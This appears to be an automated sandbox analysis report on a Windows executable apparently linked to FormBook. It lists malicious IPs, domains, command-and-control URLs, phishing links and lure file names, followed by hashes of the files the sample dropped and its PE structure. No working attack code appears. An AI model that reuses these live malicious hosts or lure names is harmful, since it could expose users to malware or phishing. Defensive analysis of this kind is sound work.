Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 52.165.164.15
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.141.156.114	Recibos.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
188.114.96.3	https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t	Get hash	malicious	HTMLPhisher	Browse	cocteldedeas.mx/rx567/
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	www.zrichiod-riech.sbs/kf10/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.einpisalpace.shop/pgw3/
	https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005	Get hash	malicious	Unknown	Browse	jackoffjackofflilliilkillxoopoeadonline.top/drive/
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy
	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.madhf.tech	PO2412010.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.182.242
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Purchase Order..exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Quotation Validity.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.242
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	15.204.67.7
	Purchase Order PO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.242
	Payment_Confirmation_pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.242
r0lqcud7.nbnnn.xyz	order confirmation.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	UPDATED CONTRACT.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Latest advice payment.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.225.159.42
	quotation.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	lKvXJ7VVCK.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
www.izmirescortg.xyz	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	Order MEI PO IM202411484.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.186.192
	file.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	104.21.36.62

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=	Get hash	malicious	Unknown	Browse	104.17.25.14
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	87J30ulb4q.exe	Get hash	malicious	Unknown	Browse	104.21.96.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
TRELLIAN-AS-APTrellianPtyLimitedAU	n0srYVYMDI.exe	Get hash	malicious	FormBook	Browse	103.224.212.213
	http://www.jmclmedia.ph	Get hash	malicious	Unknown	Browse	103.224.182.206
	NkMMNoILv9.exe	Get hash	malicious	Unknown	Browse	103.224.212.212
	http://www.finanzamthessen.de	Get hash	malicious	Unknown	Browse	103.224.182.245
	https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf	Get hash	malicious	PDFPhish	Browse	103.224.182.253
	PO1341489LTB GROUP.vbs	Get hash	malicious	FormBook	Browse	103.224.182.242
	http://www.firsthealthbp.com	Get hash	malicious	Unknown	Browse	103.224.212.254
	PO2412010.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	http://divisioninfo.net/	Get hash	malicious	Unknown	Browse	103.224.182.251
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.182.242
YURTEH-ASUA	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse	152.89.61.96
	https://alluc.co/watch-movies/passengers.html	Get hash	malicious	Unknown	Browse	31.42.184.242
	Recibos.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	support.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	31.42.187.210
INTERHOPCA	arm4.elf	Get hash	malicious	Mirai	Browse	165.154.119.54
	i686.elf	Get hash	malicious	Mirai	Browse	165.154.144.14
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	165.154.119.65
	sh4.elf	Get hash	malicious	Mirai	Browse	165.154.120.14
	https://mj.ostep.net/acknowledgements	Get hash	malicious	Unknown	Browse	165.154.182.38
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	165.154.232.175
	http://www771771u.com/	Get hash	malicious	Unknown	Browse	165.154.224.29
	http://www.choeshop.com	Get hash	malicious	Unknown	Browse	165.154.254.46
	PTT Group project - Quotation.exe	Get hash	malicious	FormBook	Browse	165.154.0.120
	RFQ - MK FMHS.RFQ.24.101.exe	Get hash	malicious	FormBook	Browse	165.154.0.120

Process:	C:\Windows\SysWOW64\mobsync.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Melber

Download File

Process:	C:\Users\user\Desktop\M7XS5C07kV.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	143378
Entropy (8bit):	2.9925220962728587
Encrypted:	false
SSDEEP:	96:AIXLr4j+F05BmsDo6Mi0Fl7dSA6wOnjvsCGcuY9Ihyvuu3srWVjjGqnBaAJZdjum:H30jU7CRGcuY9Ihyvuu3srWVeqnBaA
MD5:	9437A91969C65681E03EF7F26238C083
SHA1:	A00640FDBBF3C6C869ECA3E241CCD0D64B907933
SHA-256:	192BEE318F743CA7ECBDECFA5B2B0412BDCBDAC7F40207B2F133EE7C84BA073D
SHA-512:	A0E69320752897DD75C74618D8F64FC5C86F4A74C9198DF20370B625570F8F05678A039A7A1040CD2FEFAA199BE4050B4650D9D71A69C8612F125DC1A1FAC618
Malicious:	false
Reputation:	low
Preview:	dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

C:\Users\user\AppData\Local\Temp\autF412.tmp

Download File

Process:	C:\Users\user\Desktop\M7XS5C07kV.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.995564016527099
Encrypted:	true
SSDEEP:	6144:+WjUGFvrWOPGokbAynPvQ1dPbF2sbXyEU79W4o7m35wGPEY:+WjPFiboN1dPbnDHJ45J3EY
MD5:	706BCAA0BE1D36F1BE3C9A42BA2DA69B
SHA1:	73A096F7EBCAA124A3BF2008DD49F4827CC04051
SHA-256:	87E1EFE831F84B7EA61895F73369E54FAE42C8CCD9B680DCFE1A27F8AF6B9A33
SHA-512:	4AE3C9F590A72F7D8B3CB1F45469C8D510F46EF2993AC6A57717860D58EC596CED2CA4ED87492E545841AF9CF5B481F2125770F8C1F8417F260E0FA981ED8C50
Malicious:	false
Preview:	...ZNZD5ESU2..6C.TEQNQ3D.OZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW.COTKN._3.C.{.[..`.=[?wF1 370#qP%$!59z&Pa! \l>Xc...q#>W!dBWG~D5ASU2L.7J.i%6.lS#.r:*.^..oR+.,..y1).)..f-=.g(0=.,0.COTEQNQ3..OZ.[E5.{.RLW6COTEQ.Q1EANQMZ.1ASU2LW6CO.QQNQ#DJO:IZD5.SU"LW6AOTCQNQ3DJO\MZD5ASU2,S6CMTEQNQ3FJ..MZT5ACU2LW&CODEQNQ3DZOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTk%+)GDJO..^D5QSU2.S6C_TEQNQ3DJOZMZD5aSURLW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU

C:\Users\user\AppData\Local\Temp\autF441.tmp

Download File

Process:	C:\Users\user\Desktop\M7XS5C07kV.exe
File Type:	data
Category:	dropped
Size (bytes):	14592
Entropy (8bit):	7.6362963479003705
Encrypted:	false
SSDEEP:	384:ITYznwMNeAOPPYLDfvWME/eTk5mUOYz7EV2ojS6DBYUPsi6t:IAwJV8DfvWkOL/oGmBvq
MD5:	4160053B70184A09856F07F6BD33102A
SHA1:	CD6F4CB45F17C55F2CF401774E1018A6BC726C99
SHA-256:	2ED6EB49AC66E0323B12D851A1C950D9F324D2EEB861E6F1BD2CD086EA94CDB3
SHA-512:	63C992CB31D5B6F95BFEFA631546D85A8CE2D745F39A4AC26C2A61676853E014B9A831B8B48E8E013C3B20641290CB4D04D4EDFA7496465832F33BD9F01C14A3
Malicious:	false
Preview:	EA06..0..[.....+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\konked

Download File

Process:	C:\Users\user\Desktop\M7XS5C07kV.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.995564016527099
Encrypted:	true
SSDEEP:	6144:+WjUGFvrWOPGokbAynPvQ1dPbF2sbXyEU79W4o7m35wGPEY:+WjPFiboN1dPbnDHJ45J3EY
MD5:	706BCAA0BE1D36F1BE3C9A42BA2DA69B
SHA1:	73A096F7EBCAA124A3BF2008DD49F4827CC04051
SHA-256:	87E1EFE831F84B7EA61895F73369E54FAE42C8CCD9B680DCFE1A27F8AF6B9A33
SHA-512:	4AE3C9F590A72F7D8B3CB1F45469C8D510F46EF2993AC6A57717860D58EC596CED2CA4ED87492E545841AF9CF5B481F2125770F8C1F8417F260E0FA981ED8C50
Malicious:	false
Preview:	...ZNZD5ESU2..6C.TEQNQ3D.OZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW.COTKN._3.C.{.[..`.=[?wF1 370#qP%$!59z&Pa! \l>Xc...q#>W!dBWG~D5ASU2L.7J.i%6.lS#.r:*.^..oR+.,..y1).)..f-=.g(0=.,0.COTEQNQ3..OZ.[E5.{.RLW6COTEQ.Q1EANQMZ.1ASU2LW6CO.QQNQ#DJO:IZD5.SU"LW6AOTCQNQ3DJO\MZD5ASU2,S6CMTEQNQ3FJ..MZT5ACU2LW&CODEQNQ3DZOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTk%+)GDJO..^D5QSU2.S6C_TEQNQ3DJOZMZD5aSURLW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU2LW6COTEQNQ3DJOZMZD5ASU

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.176093883204343
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	M7XS5C07kV.exe
File size:	1'195'008 bytes
MD5:	82fc7a942b147e01bf1e044b839a6a0b
SHA1:	76100e3f8b7efffab85588fa223292c903b624c3
SHA256:	0dbe28ff5ab9cae26e7bc59f61fa8641b6b9675cd8276b5f40930ff14d685400
SHA512:	dace521e4279d51b5b2a21eb2ec3143474e539032482afefb414501b651f909edbb99a3720dc9799eb3e0df23ada65fed5d271052b9a8397c227d8b56653ef27
SSDEEP:	24576:4u6J33O0c+JY5UZ+XC0kGso6FarYQuoNl8gmqpWY:yu0c++OCvkGs9Far8oNltmHY
TLSH:	B645CF22B3DDC360CB669173BF69B7016EBF3C214630B95B2F980D7DA950162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6757A77B [Tue Dec 10 02:29:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F29C0EF73CAh
jmp 00007F29C0EEA194h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F29C0EEA31Ah
cmp edi, eax
jc 00007F29C0EEA67Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F29C0EEA319h
rep movsb
jmp 00007F29C0EEA62Ch
cmp ecx, 00000080h
jc 00007F29C0EEA4E4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F29C0EEA320h
bt dword ptr [004BE324h], 01h
jc 00007F29C0EEA7F0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F29C0EEA4BDh
test edi, 00000003h
jne 00007F29C0EEA4CEh
test esi, 00000003h
jne 00007F29C0EEA4ADh
bt edi, 02h
jnc 00007F29C0EEA31Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F29C0EEA323h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F29C0EEA375h
bt esi, 03h
jnc 00007F29C0EEA3C8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5b2a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x123000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5b2a0	0x5b400	d9fc92d51ee99cf4db7470a0a9fbdf2b	False	0.9277156464041096	data	7.894429065301477	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x123000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x52568	data			1.000329126835401
RT_GROUP_ICON	0x121d20	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x121d98	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x121dac	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x121dc0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x121dd4	0xdc	data	English	Great Britain	0.6181818181818182
